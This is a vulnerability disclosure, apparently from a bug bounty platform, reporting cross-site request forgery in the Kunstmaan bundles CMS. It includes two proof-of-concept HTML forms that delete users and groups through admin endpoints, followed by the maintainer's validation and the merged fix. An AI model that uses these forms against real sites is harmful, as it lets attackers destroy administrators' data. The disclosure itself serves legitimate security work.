Cross-Site Request Forgery (CSRF) in kunstmaan/kunstmaanbundlescms

Valid

Reported on

Oct 17th 2021


Description

There is exist multiple high impact CSRF that attacker can delete many part of applications contents.

I provide the full list of CSRFs vulnerable endpoints for you.

(because the number of endpoints are too many I don't put the PoC.html of all of the vulnerable endpoints)

Occurences

delete any blog tag

delete any blog author

Delete any Bike

delete any user

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.bundles.kunstmaan.be/en/admin/settings/users/{id} /delete">
      <input type="hidden" name="delete" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

replace {id} with user id

delete any group

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.bundles.kunstmaan.be/en/admin/settings/groups/{id}/delete?delete=">
      <input type="hidden" name="delete" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

replace {id} with groups id

delete any blog category

We have contacted a member of the kunstmaan/kunstmaanbundlescms team and are waiting to hear back 2 months ago
amammad
2 months ago

Researcher


This CSRFs have a can make high impact damage to admin panel, please don't reduce the bounty amount.

thanks so much.

2 months ago

Maintainer


Hi @amammad, thanks for the report!

@admin should I mark this issue as valid or not? The "base issue" was already reported in a separate vulnarability report and that one was marked as valid. The difference is that this report lists more locations that can exploited this security issue.

Jamie Slome
2 months ago

Admin


If you believe the new occurrences, i.e. permalinks point to unaddressed points of failure, feel free to mark this report as valid, yes.

amammad
2 months ago

Researcher


Hey @maintainer

just tell me to remove the repetitive endpoints

amammad
2 months ago

Researcher


@maintainer I found All vulnerable endpoint carefully to aware you of all occurrences

please if there isn't any problem, just validate my report too.

best regards.

kunstmaan/kunstmaanbundlescms maintainer validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
kunstmaan/kunstmaanbundlescms maintainer confirmed that a fix has been merged on 4f5612 a month ago
The fix bounty has been dropped
Author.php#L1-L19 has been validated
Category.php#L1-L21 has been validated
Tag.php#L1-L21 has been validated
RedirectRouter.php#L1-L219 has been validated
User.php#L1-L22 has been validated
PagePartAdmin.php#L1-L387 has been validated
Bike.php#L1-L171 has been validated